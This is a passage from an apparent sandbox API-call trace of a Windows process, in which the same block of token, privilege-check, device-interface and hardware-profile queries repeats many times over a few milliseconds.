OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.027] GetLastError () returned 0x3f0 [0085.027] GetCurrentProcess () returned 0xffffffff [0085.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.027] SetLastError (dwErrCode=0x522) [0085.027] CloseHandle (hObject=0x114) returned 1 [0085.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.027] GetLastError () returned 0x578 [0085.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.027] GetCurrentThread () returned 0xfffffffe [0085.027] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.027] GetLastError () returned 0x3f0 [0085.027] GetCurrentProcess () returned 0xffffffff [0085.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.027] SetLastError (dwErrCode=0x522) [0085.027] CloseHandle (hObject=0x114) returned 1 [0085.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.027] GetLastError () returned 0x578 [0085.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.027] GetCurrentThread () returned 0xfffffffe [0085.027] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.027] GetLastError () returned 0x3f0 [0085.027] GetCurrentProcess () returned 0xffffffff [0085.027] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.027] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.027] SetLastError (dwErrCode=0x522) [0085.027] CloseHandle (hObject=0x114) returned 1 [0085.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.027] GetLastError () returned 0x578 [0085.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.027] GetCurrentThread () returned 0xfffffffe [0085.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.028] GetLastError () returned 0x3f0 [0085.028] GetCurrentProcess () returned 0xffffffff [0085.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.028] SetLastError (dwErrCode=0x522) [0085.028] CloseHandle (hObject=0x114) returned 1 [0085.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.028] GetLastError () returned 0x578 [0085.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.028] GetCurrentThread () returned 0xfffffffe [0085.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.028] GetLastError () returned 0x3f0 [0085.028] GetCurrentProcess () returned 0xffffffff [0085.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.028] SetLastError (dwErrCode=0x522) [0085.028] CloseHandle (hObject=0x114) returned 1 [0085.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.028] GetLastError () returned 0x578 [0085.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.028] GetCurrentThread () returned 0xfffffffe [0085.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.028] GetLastError () returned 0x3f0 [0085.028] GetCurrentProcess () returned 0xffffffff [0085.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.028] SetLastError (dwErrCode=0x522) [0085.028] CloseHandle (hObject=0x114) returned 1 [0085.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.028] GetLastError () returned 0x578 [0085.028] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.028] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.028] GetCurrentThread () returned 0xfffffffe [0085.028] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.028] GetLastError () returned 0x3f0 [0085.028] GetCurrentProcess () returned 0xffffffff [0085.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.028] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.028] SetLastError (dwErrCode=0x522) [0085.028] CloseHandle (hObject=0x114) returned 1 [0085.028] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.028] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.029] GetLastError () returned 0x578 [0085.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.029] GetCurrentThread () returned 0xfffffffe [0085.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.029] GetLastError () returned 0x3f0 [0085.029] GetCurrentProcess () returned 0xffffffff [0085.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.029] SetLastError (dwErrCode=0x522) [0085.029] CloseHandle (hObject=0x114) returned 1 [0085.029] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.029] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.029] GetLastError () returned 0x578 [0085.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.029] GetCurrentThread () returned 0xfffffffe [0085.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.029] GetLastError () returned 0x3f0 [0085.029] GetCurrentProcess () returned 0xffffffff [0085.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.029] SetLastError (dwErrCode=0x522) [0085.029] CloseHandle (hObject=0x114) returned 1 [0085.029] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.029] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.029] GetLastError () returned 0x578 [0085.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.029] GetCurrentThread () returned 0xfffffffe [0085.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.029] GetLastError () returned 0x3f0 [0085.029] GetCurrentProcess () returned 0xffffffff [0085.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.029] SetLastError (dwErrCode=0x522) [0085.029] CloseHandle (hObject=0x114) returned 1 [0085.029] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.029] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.029] GetLastError () returned 0x578 [0085.029] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.029] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.029] GetCurrentThread () returned 0xfffffffe [0085.029] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.029] GetLastError () returned 0x3f0 [0085.029] GetCurrentProcess () returned 0xffffffff [0085.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.029] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.030] SetLastError (dwErrCode=0x522) [0085.030] CloseHandle (hObject=0x114) returned 1 [0085.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.030] GetLastError () returned 0x578 [0085.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.030] GetCurrentThread () returned 0xfffffffe [0085.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.030] GetLastError () returned 0x3f0 [0085.030] GetCurrentProcess () returned 0xffffffff [0085.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.030] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.030] SetLastError (dwErrCode=0x522) [0085.030] CloseHandle (hObject=0x114) returned 1 [0085.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.030] GetLastError () returned 0x578 [0085.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.030] GetCurrentThread () returned 0xfffffffe [0085.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.030] GetLastError () returned 0x3f0 [0085.030] GetCurrentProcess () returned 0xffffffff [0085.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.030] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.030] SetLastError (dwErrCode=0x522) [0085.030] CloseHandle (hObject=0x114) returned 1 [0085.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.030] GetLastError () returned 0x578 [0085.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.030] GetCurrentThread () returned 0xfffffffe [0085.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.030] GetLastError () returned 0x3f0 [0085.030] GetCurrentProcess () returned 0xffffffff [0085.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.030] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.030] SetLastError (dwErrCode=0x522) [0085.030] CloseHandle (hObject=0x114) returned 1 [0085.030] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.030] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.030] GetLastError () returned 0x578 [0085.030] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.030] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.030] GetCurrentThread () returned 0xfffffffe [0085.030] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.030] GetLastError () returned 0x3f0 [0085.031] GetCurrentProcess () returned 0xffffffff [0085.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.031] SetLastError (dwErrCode=0x522) [0085.031] CloseHandle (hObject=0x114) returned 1 [0085.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.031] GetLastError () returned 0x578 [0085.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.031] GetCurrentThread () returned 0xfffffffe [0085.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.031] GetLastError () returned 0x3f0 [0085.031] GetCurrentProcess () returned 0xffffffff [0085.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.031] SetLastError (dwErrCode=0x522) [0085.031] CloseHandle (hObject=0x114) returned 1 [0085.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.031] GetLastError () returned 0x578 [0085.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.031] GetCurrentThread () returned 0xfffffffe [0085.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.031] GetLastError () returned 0x3f0 [0085.031] GetCurrentProcess () returned 0xffffffff [0085.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.031] SetLastError (dwErrCode=0x522) [0085.031] CloseHandle (hObject=0x114) returned 1 [0085.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.031] GetLastError () returned 0x578 [0085.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.031] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.031] GetCurrentThread () returned 0xfffffffe [0085.031] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.031] GetLastError () returned 0x3f0 [0085.031] GetCurrentProcess () returned 0xffffffff [0085.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.031] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.031] SetLastError (dwErrCode=0x522) [0085.031] CloseHandle (hObject=0x114) returned 1 [0085.031] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.031] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.031] GetLastError () returned 0x578 [0085.031] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.032] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.032] GetCurrentThread () returned 0xfffffffe [0085.032] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.032] GetLastError () returned 0x3f0 [0085.032] GetCurrentProcess () returned 0xffffffff [0085.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.032] SetLastError (dwErrCode=0x522) [0085.032] CloseHandle (hObject=0x114) returned 1 [0085.032] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.032] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.032] GetLastError () returned 0x578 [0085.032] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.032] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.032] GetCurrentThread () returned 0xfffffffe [0085.032] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.032] GetLastError () returned 0x3f0 [0085.032] GetCurrentProcess () returned 0xffffffff [0085.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.032] SetLastError (dwErrCode=0x522) [0085.032] CloseHandle (hObject=0x114) returned 1 [0085.032] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.032] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.032] GetLastError () returned 0x578 [0085.032] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.032] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.032] GetCurrentThread () returned 0xfffffffe [0085.032] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.032] GetLastError () returned 0x3f0 [0085.032] GetCurrentProcess () returned 0xffffffff [0085.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.032] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.032] SetLastError (dwErrCode=0x522) [0085.032] CloseHandle (hObject=0x114) returned 1 [0085.032] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.032] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.032] GetLastError () returned 0x578 [0085.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.033] GetCurrentThread () returned 0xfffffffe [0085.033] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.033] GetLastError () returned 0x3f0 [0085.033] GetCurrentProcess () returned 0xffffffff [0085.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.033] SetLastError (dwErrCode=0x522) [0085.033] CloseHandle (hObject=0x114) returned 1 [0085.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.033] GetLastError () returned 0x578 [0085.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.033] GetCurrentThread () returned 0xfffffffe [0085.033] OpenThreadToken (in: 